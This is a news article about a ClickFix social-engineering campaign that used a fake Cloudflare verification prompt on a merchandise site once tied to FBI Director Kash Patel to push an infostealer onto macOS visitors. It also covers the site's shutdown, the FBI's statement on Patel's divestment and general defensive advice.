ClickFix Malware on FBI Director Kash Patel's Former Apparel Site Targets macOS Users
A ClickFix malware campaign on the Based Apparel merchandise page, co-founded by FBI Director Kash Patel, targeted macOS shoppers with a fake Cloudflare verification to deploy an infostealer.
A malware campaign targeting macOS users struck the merchandise page of the Patel Foundation, co-founded by FBI Director Kash Patel, on Thursday. The Based Apparel site served a ClickFix attack that attempted to trick shoppers into running a malicious command disguised as a Cloudflare verification step. The entire merchandise shop was taken offline Friday after the incident was publicly disclosed.
The attack specifically targeted visitors to basedapparel.com/product-category/the-kash-foundation/, where a fake Cloudflare turnstile page prompted users to copy a string reading "I am not a robot: Cloudflare Verification ID: 801470" into their command line. When users clicked the copy button, an obfuscated hidden command was actually copied to the clipboard. Executing that command would pull down an infostealer designed to exfiltrate data from cryptocurrency wallets, session tokens, Keychain data, and credentials stored in browsers.
The ClickFix social engineering technique has been growing in popularity, with Microsoft Threat Intelligence noting in an analysis that campaigns using this method target "thousands of enterprise and end-user devices globally every day." The technique exploits user trust in common web verification processes to trick victims into running arbitrary commands that download malware.
A Twitter user named "debbie" first identified the malware and retrieved the malicious shell script payload. She told PCMag that the payload was flagged as malicious by 27 security vendors on VirusTotal, indicating broad detection across the antivirus industry. The incident follows a prior breach of Patel's personal email by Iran-linked hackers in March, when a group widely believed to be a front for Iranian intelligence broke into a Gmail account the FBI director once used.
Based Apparel was co-founded by Patel and Andrew Ollis, a direct marketing entrepreneur with many business ties to Patel. Although Patel resigned from the clothing store before February 2025, his name and graphics from his personal foundation are printed on shirts and hoodies sold at the shop. The FBI issued a statement clarifying that "Based Apparel is no longer Director Patel's website. Patel divested from any interest in it prior to being confirmed as FBI Director and does not profit from it." Based Apparel did not respond to a request for comment.
The incident highlights the ongoing risk of supply-chain and brand-adjacent attacks targeting high-profile individuals and their associated businesses. Even after divestment, the association with a current FBI director made the site an attractive target for threat actors seeking to compromise visitors' devices. The use of macOS-specific targeting also underscores the growing attention attackers are paying to Apple's user base, which has historically been perceived as less vulnerable to malware.
Security experts recommend that users remain cautious when encountering unexpected verification prompts on e-commerce sites, particularly those that ask them to run commands in a terminal. Organizations should also consider implementing web application firewalls and content security policies to detect and block such social engineering attacks at the network level.